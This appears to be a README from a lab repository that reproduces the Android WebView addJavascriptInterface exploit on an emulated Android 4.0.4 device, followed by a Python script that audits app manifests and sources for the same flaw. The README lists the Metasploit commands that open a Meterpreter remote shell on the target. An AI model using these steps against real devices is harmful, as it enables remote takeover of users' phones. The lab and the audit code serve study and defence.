Based on the following resources:
https://www.rapid7.com/db/modules/exploit/android/browser/webview_addjavascriptinterface
https://pentestlab.blog/2017/02/12/android-webview-vulnerabilities/
https://cyberarms.wordpress.com/2014/02/26/android-webview-exploit-tutorial-70-of-devices-vulnerable/
This repo contains:
- README with the topology and the Kali commands used in msfconsole
- the code from the APK on the terminal device
Note: Tested it on a 4.0.4 Android device. I also tested on 4.1 (with the same code as added here), but it seems that the exploit did not work anymore on it.
-
Topology Android 4.0.4 (in AVD) <--------> Windows 10 HOST <---Vbox vmnet 0 bridge connection----> Kali VM
-
To start the server on the Kali VM, use:
$ msfconsole
msf > use exploit/android/browser/webview_addjavascriptinterface
msf exploit(webview_addjavascriptinterface) > set LHOST $IP_OF_THE_KALI_MACHINE
msf exploit(webview_addjavascriptinterface) > set uripath $PATH_TO_USE
msf exploit(webview_addjavascriptinterface) > set SRVPORT 80 (you can change the port if you want)
msf exploit(webview_addjavascriptinterface) > exploit
The message "Server started" should now appear.
-
Now go to the Android device and run the app.
-
msfconsole should now show: "Meterpreter session X (starts from 1) opened"
msf exploit(webview_addjavascriptinterface) > sessions -i X (the id of the session started)
-
Access the console and enjoy!
-
Be sure to update the device to a patched version in the end!
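
Patching the device covers one side; on the app side, from API level 17 (Android 4.2) only methods annotated `@JavascriptInterface` are exposed to page script when the app targets that level. The audit below is an added example, not code from this repo: the manifest, the `MainActivity.java` snippet and the `Bridge` class are constructed samples, and it assumes the SDK levels are declared in `<uses-sdk>` rather than in a Gradle file.

```python
import re
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"
ANNOTATION_API = 17  # Android 4.2: first level that honours @JavascriptInterface
CALL_RE = re.compile(r"\.addJavascriptInterface\s*\(")

# Constructed sample inputs (not taken from this repo's APK).
SAMPLE_MANIFEST = """<manifest
    xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.lab">
  <uses-sdk android:minSdkVersion="15" android:targetSdkVersion="15"/>
</manifest>"""
SAMPLE_SOURCES = {"MainActivity.java": """WebView wv = new WebView(this);
wv.getSettings().setJavaScriptEnabled(true);
// wv.addJavascriptInterface(old, "legacy");
wv.addJavascriptInterface(new Bridge(), "bridge");
wv.loadUrl(url);"""}

def sdk_levels(manifest_xml):
    """Return (minSdkVersion, targetSdkVersion) declared in the manifest text."""
    sdk = ET.fromstring(manifest_xml).find("uses-sdk")
    if sdk is None:
        return 1, 1  # Android treats a missing <uses-sdk> as API level 1
    min_sdk = int(sdk.get(ANDROID_NS + "minSdkVersion", "1"))
    # targetSdkVersion falls back to minSdkVersion when it is not declared
    return min_sdk, int(sdk.get(ANDROID_NS + "targetSdkVersion", str(min_sdk)))

def audit(manifest_xml, sources):
    """Return [(file, line_no, reason)] for each risky addJavascriptInterface call."""
    min_sdk, target = sdk_levels(manifest_xml)
    if target < ANNOTATION_API:
        reason = f"targetSdkVersion {target} < 17: every public method of the object is exposed"
    elif min_sdk < ANNOTATION_API:
        reason = f"minSdkVersion {min_sdk} < 17: installs on devices that ignore the annotation"
    else:
        return []  # only @JavascriptInterface methods are reachable
    findings = []
    for name, text in sources.items():
        for line_no, line in enumerate(text.splitlines(), 1):
            # skip calls that are commented out with a leading //
            if CALL_RE.search(line) and not line.lstrip().startswith("//"):
                findings.append((name, line_no, reason))
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE_MANIFEST, SAMPLE_SOURCES):
        print("%s:%d: %s" % finding)
```

A clean result only means the annotation rule applies; each `@JavascriptInterface` method still needs review for what it lets untrusted page content do.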